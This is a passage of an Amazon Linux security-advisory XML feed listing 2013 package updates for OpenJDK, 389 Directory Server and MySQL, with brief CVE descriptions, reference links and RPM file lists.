CVE-2013-1537:
The previous default value of the java.rmi.server.useCodebaseOnly property permitted the RMI implementation to automatically load classes from remotely specified locations. An attacker able to connect to an application using RMI could use this flaw to make the application execute arbitrary code.
CVE-2013-1518:
Multiple improper permission check issues were discovered in the Beans, Libraries, JAXP, and RMI components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass Java sandbox restrictions.
CVE-2013-1488:
The JDBC driver manager could incorrectly call the toString() method in JDBC drivers, and the ConcurrentHashMap class could incorrectly call the defaultReadObject() method. An untrusted Java application or applet could possibly use these flaws to bypass Java sandbox restrictions.
CVE-2013-0401:
The sun.awt.datatransfer.ClassLoaderObjectInputStream class may incorrectly invoke the system class loader. An untrusted Java application or applet could possibly use this flaw to bypass certain Java sandbox restrictions.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0401" title="" id="CVE-2013-0401" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1488" title="" id="CVE-2013-1488" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1518" title="" id="CVE-2013-1518" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1537" title="" id="CVE-2013-1537" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1557" title="" id="CVE-2013-1557" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1558" title="" id="CVE-2013-1558" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1569" title="" id="CVE-2013-1569" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2383" title="" id="CVE-2013-2383" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2384" title="" id="CVE-2013-2384" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2415" title="" id="CVE-2013-2415" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2417" title="" id="CVE-2013-2417" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2419" title="" id="CVE-2013-2419" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2420" title="" id="CVE-2013-2420" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2421" title="" id="CVE-2013-2421" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2422" title="" id="CVE-2013-2422" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2423" title="" id="CVE-2013-2423" type="cve" /><reference 
href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2424" title="" id="CVE-2013-2424" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2426" title="" id="CVE-2013-2426" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2429" title="" id="CVE-2013-2429" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2430" title="" id="CVE-2013-2430" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2431" title="" id="CVE-2013-2431" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2436" title="" id="CVE-2013-2436" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2013:0751.html" title="" id="RHSA-2013:0751" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="java-1.7.0-openjdk-debuginfo" version="1.7.0.19" release="2.3.9.1.25.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-debuginfo-1.7.0.19-2.3.9.1.25.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk-javadoc" version="1.7.0.19" release="2.3.9.1.25.amzn1" epoch="1" arch="noarch"><filename>Packages/java-1.7.0-openjdk-javadoc-1.7.0.19-2.3.9.1.25.amzn1.noarch.rpm</filename></package><package name="java-1.7.0-openjdk-devel" version="1.7.0.19" release="2.3.9.1.25.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-devel-1.7.0.19-2.3.9.1.25.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk-demo" version="1.7.0.19" release="2.3.9.1.25.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-demo-1.7.0.19-2.3.9.1.25.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk" version="1.7.0.19" release="2.3.9.1.25.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-1.7.0.19-2.3.9.1.25.amzn1.x86_64.rpm</filename></package><package 
name="java-1.7.0-openjdk-src" version="1.7.0.19" release="2.3.9.1.25.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-src-1.7.0.19-2.3.9.1.25.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk-demo" version="1.7.0.19" release="2.3.9.1.25.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-demo-1.7.0.19-2.3.9.1.25.amzn1.i686.rpm</filename></package><package name="java-1.7.0-openjdk-src" version="1.7.0.19" release="2.3.9.1.25.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-src-1.7.0.19-2.3.9.1.25.amzn1.i686.rpm</filename></package><package name="java-1.7.0-openjdk" version="1.7.0.19" release="2.3.9.1.25.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-1.7.0.19-2.3.9.1.25.amzn1.i686.rpm</filename></package><package name="java-1.7.0-openjdk-debuginfo" version="1.7.0.19" release="2.3.9.1.25.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-debuginfo-1.7.0.19-2.3.9.1.25.amzn1.i686.rpm</filename></package><package name="java-1.7.0-openjdk-devel" version="1.7.0.19" release="2.3.9.1.25.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-devel-1.7.0.19-2.3.9.1.25.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2013-184</id><title>Amazon Linux AMI 2012.09 - ALAS-2013-184: low priority package update for 389-ds-base</title><issued date="2013-04-18 15:39:00" /><updated date="2014-09-15 22:52:00" /><severity>low</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2013-1897:
The 389 Directory Server is an LDAPv3 compliant server. The base packages include the Lightweight Directory Access Protocol (LDAP) server and command-line utilities for server administration. It was found that the 389 Directory Server did not properly restrict access to entries when the "nsslapd-allow-anonymous-access" configuration setting was set to "rootdse". An anonymous user could connect to the LDAP database and, if the search scope is set to BASE, obtain access to information outside of the rootDSE.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1897" title="" id="CVE-2013-1897" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2013:0742.html" title="" id="RHSA-2013:0742" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="389-ds-base" version="1.3.0.6" release="1.3.amzn1" epoch="0" arch="x86_64"><filename>Packages/389-ds-base-1.3.0.6-1.3.amzn1.x86_64.rpm</filename></package><package name="389-ds-base-libs" version="1.3.0.6" release="1.3.amzn1" epoch="0" arch="x86_64"><filename>Packages/389-ds-base-libs-1.3.0.6-1.3.amzn1.x86_64.rpm</filename></package><package name="389-ds-base-debuginfo" version="1.3.0.6" release="1.3.amzn1" epoch="0" arch="x86_64"><filename>Packages/389-ds-base-debuginfo-1.3.0.6-1.3.amzn1.x86_64.rpm</filename></package><package name="389-ds-base-devel" version="1.3.0.6" release="1.3.amzn1" epoch="0" arch="x86_64"><filename>Packages/389-ds-base-devel-1.3.0.6-1.3.amzn1.x86_64.rpm</filename></package><package name="389-ds-base" version="1.3.0.6" release="1.3.amzn1" epoch="0" arch="i686"><filename>Packages/389-ds-base-1.3.0.6-1.3.amzn1.i686.rpm</filename></package><package name="389-ds-base-devel" version="1.3.0.6" release="1.3.amzn1" epoch="0" arch="i686"><filename>Packages/389-ds-base-devel-1.3.0.6-1.3.amzn1.i686.rpm</filename></package><package name="389-ds-base-debuginfo" version="1.3.0.6" release="1.3.amzn1" epoch="0" arch="i686"><filename>Packages/389-ds-base-debuginfo-1.3.0.6-1.3.amzn1.i686.rpm</filename></package><package name="389-ds-base-libs" version="1.3.0.6" release="1.3.amzn1" epoch="0" arch="i686"><filename>Packages/389-ds-base-libs-1.3.0.6-1.3.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2013-185</id><title>Amazon Linux AMI 2012.09 - ALAS-2013-185: 
important priority package update for java-1.6.0-openjdk</title><issued date="2013-04-25 20:40:00" /><updated date="2014-09-15 22:53:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2013-2431:
It was discovered that the Hotspot component did not properly handle certain intrinsic frames, and did not correctly perform MethodHandle lookups. An untrusted Java application or applet could use these flaws to bypass Java sandbox restrictions.
CVE-2013-2430:
It was discovered that JPEGImageReader and JPEGImageWriter in the ImageIO component did not protect against modification of their state while performing certain native code operations. An untrusted Java application or applet could possibly use these flaws to trigger Java Virtual Machine memory corruption.
CVE-2013-2429:
It was discovered that JPEGImageReader and JPEGImageWriter in the ImageIO component did not protect against modification of their state while performing certain native code operations. An untrusted Java application or applet could possibly use these flaws to trigger Java Virtual Machine memory corruption.
CVE-2013-2426:
The JDBC driver manager could incorrectly call the toString() method in JDBC drivers, and the ConcurrentHashMap class could incorrectly call the defaultReadObject() method. An untrusted Java application or applet could possibly use these flaws to bypass Java sandbox restrictions.
CVE-2013-2424:
The MBeanInstantiator class implementation in the OpenJDK JMX component did not properly check class access before creating new instances. An untrusted Java application or applet could use this flaw to create instances of non-public classes.
CVE-2013-2422:
Multiple improper permission check issues were discovered in the Beans, Libraries, JAXP, and RMI components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass Java sandbox restrictions.
CVE-2013-2421:
It was discovered that the Hotspot component did not properly handle certain intrinsic frames, and did not correctly perform MethodHandle lookups. An untrusted Java application or applet could use these flaws to bypass Java sandbox restrictions.
CVE-2013-2420:
The 2D component did not properly process certain images. An untrusted Java application or applet could possibly use this flaw to trigger Java Virtual Machine memory corruption.
CVE-2013-2419:
Flaws were discovered in the Network component's InetAddress serialization, and the 2D component's font handling. An untrusted Java application or applet could possibly use these flaws to crash the Java Virtual Machine.
CVE-2013-2417:
Flaws were discovered in the Network component's InetAddress serialization, and the 2D component's font handling. An untrusted Java application or applet could possibly use these flaws to crash the Java Virtual Machine.
CVE-2013-2415:
It was discovered that JAX-WS could possibly create temporary files with insecure permissions. A local attacker could use this flaw to access temporary files created by an application using JAX-WS.
CVE-2013-2384:
Multiple flaws were discovered in the font layout engine in the 2D component. An untrusted Java application or applet could possibly use these flaws to trigger Java Virtual Machine memory corruption.
CVE-2013-2383:
Multiple flaws were discovered in the font layout engine in the 2D component. An untrusted Java application or applet could possibly use these flaws to trigger Java Virtual Machine memory corruption.
CVE-2013-1569:
Multiple flaws were discovered in the font layout engine in the 2D component. An untrusted Java application or applet could possibly use these flaws to trigger Java Virtual Machine memory corruption.
CVE-2013-1558:
Multiple improper permission check issues were discovered in the Beans, Libraries, JAXP, and RMI components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass Java sandbox restrictions.
CVE-2013-1557:
Multiple improper permission check issues were discovered in the Beans, Libraries, JAXP, and RMI components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass Java sandbox restrictions.
CVE-2013-1537:
The previous default value of the java.rmi.server.useCodebaseOnly property permitted the RMI implementation to automatically load classes from remotely specified locations. An attacker able to connect to an application using RMI could use this flaw to make the application execute arbitrary code.
CVE-2013-1518:
Multiple improper permission check issues were discovered in the Beans, Libraries, JAXP, and RMI components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass Java sandbox restrictions.
CVE-2013-1488:
The JDBC driver manager could incorrectly call the toString() method in JDBC drivers, and the ConcurrentHashMap class could incorrectly call the defaultReadObject() method. An untrusted Java application or applet could possibly use these flaws to bypass Java sandbox restrictions.
CVE-2013-0401:
The sun.awt.datatransfer.ClassLoaderObjectInputStream class may incorrectly invoke the system class loader. An untrusted Java application or applet could possibly use this flaw to bypass certain Java sandbox restrictions.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0401" title="" id="CVE-2013-0401" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1488" title="" id="CVE-2013-1488" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1518" title="" id="CVE-2013-1518" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1537" title="" id="CVE-2013-1537" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1557" title="" id="CVE-2013-1557" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1558" title="" id="CVE-2013-1558" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1569" title="" id="CVE-2013-1569" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2383" title="" id="CVE-2013-2383" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2384" title="" id="CVE-2013-2384" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2415" title="" id="CVE-2013-2415" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2417" title="" id="CVE-2013-2417" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2419" title="" id="CVE-2013-2419" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2420" title="" id="CVE-2013-2420" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2421" title="" id="CVE-2013-2421" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2422" title="" id="CVE-2013-2422" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2424" title="" id="CVE-2013-2424" type="cve" /><reference 
href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2426" title="" id="CVE-2013-2426" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2429" title="" id="CVE-2013-2429" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2430" title="" id="CVE-2013-2430" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2431" title="" id="CVE-2013-2431" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2013:0770.html" title="" id="RHSA-2013:0770" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="java-1.6.0-openjdk-src" version="1.6.0.0" release="61.1.11.11.53.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.6.0-openjdk-src-1.6.0.0-61.1.11.11.53.amzn1.x86_64.rpm</filename></package><package name="java-1.6.0-openjdk-demo" version="1.6.0.0" release="61.1.11.11.53.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.6.0-openjdk-demo-1.6.0.0-61.1.11.11.53.amzn1.x86_64.rpm</filename></package><package name="java-1.6.0-openjdk-javadoc" version="1.6.0.0" release="61.1.11.11.53.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.6.0-openjdk-javadoc-1.6.0.0-61.1.11.11.53.amzn1.x86_64.rpm</filename></package><package name="java-1.6.0-openjdk" version="1.6.0.0" release="61.1.11.11.53.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.6.0-openjdk-1.6.0.0-61.1.11.11.53.amzn1.x86_64.rpm</filename></package><package name="java-1.6.0-openjdk-devel" version="1.6.0.0" release="61.1.11.11.53.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.6.0-openjdk-devel-1.6.0.0-61.1.11.11.53.amzn1.x86_64.rpm</filename></package><package name="java-1.6.0-openjdk-debuginfo" version="1.6.0.0" release="61.1.11.11.53.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.6.0-openjdk-debuginfo-1.6.0.0-61.1.11.11.53.amzn1.x86_64.rpm</filename></package><package 
name="java-1.6.0-openjdk-debuginfo" version="1.6.0.0" release="61.1.11.11.53.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.6.0-openjdk-debuginfo-1.6.0.0-61.1.11.11.53.amzn1.i686.rpm</filename></package><package name="java-1.6.0-openjdk-javadoc" version="1.6.0.0" release="61.1.11.11.53.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.6.0-openjdk-javadoc-1.6.0.0-61.1.11.11.53.amzn1.i686.rpm</filename></package><package name="java-1.6.0-openjdk-devel" version="1.6.0.0" release="61.1.11.11.53.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.6.0-openjdk-devel-1.6.0.0-61.1.11.11.53.amzn1.i686.rpm</filename></package><package name="java-1.6.0-openjdk-demo" version="1.6.0.0" release="61.1.11.11.53.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.6.0-openjdk-demo-1.6.0.0-61.1.11.11.53.amzn1.i686.rpm</filename></package><package name="java-1.6.0-openjdk-src" version="1.6.0.0" release="61.1.11.11.53.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.6.0-openjdk-src-1.6.0.0-61.1.11.11.53.amzn1.i686.rpm</filename></package><package name="java-1.6.0-openjdk" version="1.6.0.0" release="61.1.11.11.53.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.6.0-openjdk-1.6.0.0-61.1.11.11.53.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2013-186</id><title>Amazon Linux AMI 2012.09 - ALAS-2013-186: important priority package update for mysql51</title><issued date="2013-04-25 20:40:00" /><updated date="2014-09-15 22:54:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2013-2392:
This update fixes several vulnerabilities in the MySQL database server. Information about these flaws can be found on the Oracle Critical Patch Update Advisory page, listed in the References section.
CVE-2013-2391:
This update fixes several vulnerabilities in the MySQL database server. Information about these flaws can be found on the Oracle Critical Patch Update Advisory page, listed in the References section.
CVE-2013-2389:
This update fixes several vulnerabilities in the MySQL database server. Information about these flaws can be found on the Oracle Critical Patch Update Advisory page, listed in the References section.
CVE-2013-2378:
This update fixes several vulnerabilities in the MySQL database server. Information about these flaws can be found on the Oracle Critical Patch Update Advisory page, listed in the References section.
CVE-2013-2375:
This update fixes several vulnerabilities in the MySQL database server. Information about these flaws can be found on the Oracle Critical Patch Update Advisory page, listed in the References section.
CVE-2013-1555:
This update fixes several vulnerabilities in the MySQL database server. Information about these flaws can be found on the Oracle Critical Patch Update Advisory page, listed in the References section.
CVE-2013-1552:
This update fixes several vulnerabilities in the MySQL database server. Information about these flaws can be found on the Oracle Critical Patch Update Advisory page, listed in the References section.
CVE-2013-1548:
This update fixes several vulnerabilities in the MySQL database server. Information about these flaws can be found on the Oracle Critical Patch Update Advisory page, listed in the References section.
CVE-2013-1544:
This update fixes several vulnerabilities in the MySQL database server. Information about these flaws can be found on the Oracle Critical Patch Update Advisory page, listed in the References section.
CVE-2013-1532:
This update fixes several vulnerabilities in the MySQL database server. Information about these flaws can be found on the Oracle Critical Patch Update Advisory page, listed in the References section.
CVE-2013-1531:
This update fixes several vulnerabilities in the MySQL database server. Information about these flaws can be found on the Oracle Critical Patch Update Advisory page, listed in the References section.
CVE-2013-1521:
This update fixes several vulnerabilities in the MySQL database server. Information about these flaws can be found on the Oracle Critical Patch Update Advisory page, listed in the References section.
CVE-2013-1506:
This update fixes several vulnerabilities in the MySQL database server. Information about these flaws can be found on the Oracle Critical Patch Update Advisory page, listed in the References section.
CVE-2012-5614:
This update fixes several vulnerabilities in the MySQL database server. Information about these flaws can be found on the Oracle Critical Patch Update Advisory page, listed in the References section.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-5614" title="" id="CVE-2012-5614" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1506" title="" id="CVE-2013-1506" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1521" title="" id="CVE-2013-1521" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1531" title="" id="CVE-2013-1531" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1532" title="" id="CVE-2013-1532" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1544" title="" id="CVE-2013-1544" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1548" title="" id="CVE-2013-1548" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1552" title="" id="CVE-2013-1552" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1555" title="" id="CVE-2013-1555" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2375" title="" id="CVE-2013-2375" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2378" title="" id="CVE-2013-2378" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2389" title="" id="CVE-2013-2389" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2391" title="" id="CVE-2013-2391" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2392" title="" id="CVE-2013-2392" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2013:0772.html" title="" id="RHSA-2013:0772" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="mysql51-test" version="5.1.69" release="1.63.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/mysql51-test-5.1.69-1.63.amzn1.x86_64.rpm</filename></package><package name="mysql51-server" version="5.1.69" release="1.63.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql51-server-5.1.69-1.63.amzn1.x86_64.rpm</filename></package><package name="mysql51-devel" version="5.1.69" release="1.63.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql51-devel-5.1.69-1.63.amzn1.x86_64.rpm</filename></package><package name="mysql51-debuginfo" version="5.1.69" release="1.63.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql51-debuginfo-5.1.69-1.63.amzn1.x86_64.rpm</filename></package><package name="mysql51-embedded" version="5.1.69" release="1.63.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql51-embedded-5.1.69-1.63.amzn1.x86_64.rpm</filename></package><package name="mysql51" version="5.1.69" release="1.63.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql51-5.1.69-1.63.amzn1.x86_64.rpm</filename></package><package name="mysql51-libs" version="5.1.69" release="1.63.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql51-libs-5.1.69-1.63.amzn1.x86_64.rpm</filename></package><package name="mysql51-embedded-devel" version="5.1.69" release="1.63.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql51-embedded-devel-5.1.69-1.63.amzn1.x86_64.rpm</filename></package><package name="mysql51-bench" version="5.1.69" release="1.63.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql51-bench-5.1.69-1.63.amzn1.x86_64.rpm</filename></package><package name="mysql51-common" version="5.1.69" release="1.63.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql51-common-5.1.69-1.63.amzn1.x86_64.rpm</filename></package><package name="mysql51-bench" version="5.1.69" release="1.63.amzn1" epoch="0" arch="i686"><filename>Packages/mysql51-bench-5.1.69-1.63.amzn1.i686.rpm</filename></package><package name="mysql51-embedded-devel" version="5.1.69" release="1.63.amzn1" epoch="0" 
arch="i686"><filename>Packages/mysql51-embedded-devel-5.1.69-1.63.amzn1.i686.rpm</filename></package><package name="mysql51-devel" version="5.1.69" release="1.63.amzn1" epoch="0" arch="i686"><filename>Packages/mysql51-devel-5.1.69-1.63.amzn1.i686.rpm</filename></package><package name="mysql51-debuginfo" version="5.1.69" release="1.63.amzn1" epoch="0" arch="i686"><filename>Packages/mysql51-debuginfo-5.1.69-1.63.amzn1.i686.rpm</filename></package><package name="mysql51-libs" version="5.1.69" release="1.63.amzn1" epoch="0" arch="i686"><filename>Packages/mysql51-libs-5.1.69-1.63.amzn1.i686.rpm</filename></package><package name="mysql51-test" version="5.1.69" release="1.63.amzn1" epoch="0" arch="i686"><filename>Packages/mysql51-test-5.1.69-1.63.amzn1.i686.rpm</filename></package><package name="mysql51" version="5.1.69" release="1.63.amzn1" epoch="0" arch="i686"><filename>Packages/mysql51-5.1.69-1.63.amzn1.i686.rpm</filename></package><package name="mysql51-embedded" version="5.1.69" release="1.63.amzn1" epoch="0" arch="i686"><filename>Packages/mysql51-embedded-5.1.69-1.63.amzn1.i686.rpm</filename></package><package name="mysql51-common" version="5.1.69" release="1.63.amzn1" epoch="0" arch="i686"><filename>Packages/mysql51-common-5.1.69-1.63.amzn1.i686.rpm</filename></package><package name="mysql51-server" version="5.1.69" release="1.63.amzn1" epoch="0" arch="i686"><filename>Packages/mysql51-server-5.1.69-1.63.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2013-187</id><title>Amazon Linux AMI 2012.09 - ALAS-2013-187: important priority package update for mysql55</title><issued date="2013-04-25 20:40:00" /><updated date="2014-09-15 22:54:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2013-2392:
This update fixes several vulnerabilities in the MySQL database server. Information about these flaws can be found on the Oracle Critical Patch Update Advisory page, listed in the References section.
CVE-2013-2391:
This update fixes several vulnerabilities in the MySQL database server. Information about these flaws can be found on the Oracle Critical Patch Update Advisory page, listed in the References section.
CVE-2013-2389:
This update fixes several vulnerabilities in the MySQL database server. Information about these flaws can be found on the Oracle Critical Patch Update Advisory page, listed in the References section.
CVE-2013-2378:
This update fixes several vulnerabilities in the MySQL database server. Information about these flaws can be found on the Oracle Critical Patch Update Advisory page, listed in the References section.
CVE-2013-2375:
This update fixes several vulnerabilities in the MySQL database server. Information about these flaws can be found on the Oracle Critical Patch Update Advisory page, listed in the References section.
CVE-2013-1555:
This update fixes several vulnerabilities in the MySQL database server. Information about these flaws can be found on the Oracle Critical Patch Update Advisory page, listed in the References section.
CVE-2013-1552:
This update fixes several vulnerabilities in the MySQL database server. Information about these flaws can be found on the Oracle Critical Patch Update Advisory page, listed in the References section.
CVE-2013-1548:
This update fixes several vulnerabilities in the MySQL database server. Information about these flaws can be found on the Oracle Critical Patch Update Advisory page, listed in the References section.
CVE-2013-1544:
This update fixes several vulnerabilities in the MySQL database server. Information about these flaws can be found on the Oracle Critical Patch Update Advisory page, listed in the References section.
CVE-2013-1532:
This update fixes several vulnerabilities in the MySQL database server. Information about these flaws can be found on the Oracle Critical Patch Update Advisory page, listed in the References section.
CVE-2013-1531:
This update fixes several vulnerabilities in the MySQL database server. Information about these flaws can be found on the Oracle Critical Patch Update Advisory page, listed in the References section.
CVE-2013-1521:
This update fixes several vulnerabilities in the MySQL database server. Information about these flaws can be found on the Oracle Critical Patch Update Advisory page, listed in the References section.
CVE-2013-1506:
This update fixes several vulnerabilities in the MySQL database server. Information about these flaws can be found on the Oracle Critical Patch Update Advisory page, listed in the References section.
CVE-2012-5614:
This update fixes several vulnerabilities in the MySQL database server. Information about these flaws can be found on the Oracle Critical Patch Update Advisory page, listed in the References section.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-5614" title="" id="CVE-2012-5614" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1506" title="" id="CVE-2013-1506" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1521" title="" id="CVE-2013-1521" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1531" title="" id="CVE-2013-1531" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1532" title="" id="CVE-2013-1532" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1544" title="" id="CVE-2013-1544" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1548" title="" id="CVE-2013-1548" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1552" title="" id="CVE-2013-1552" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1555" title="" id="CVE-2013-1555" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2375" title="" id="CVE-2013-2375" 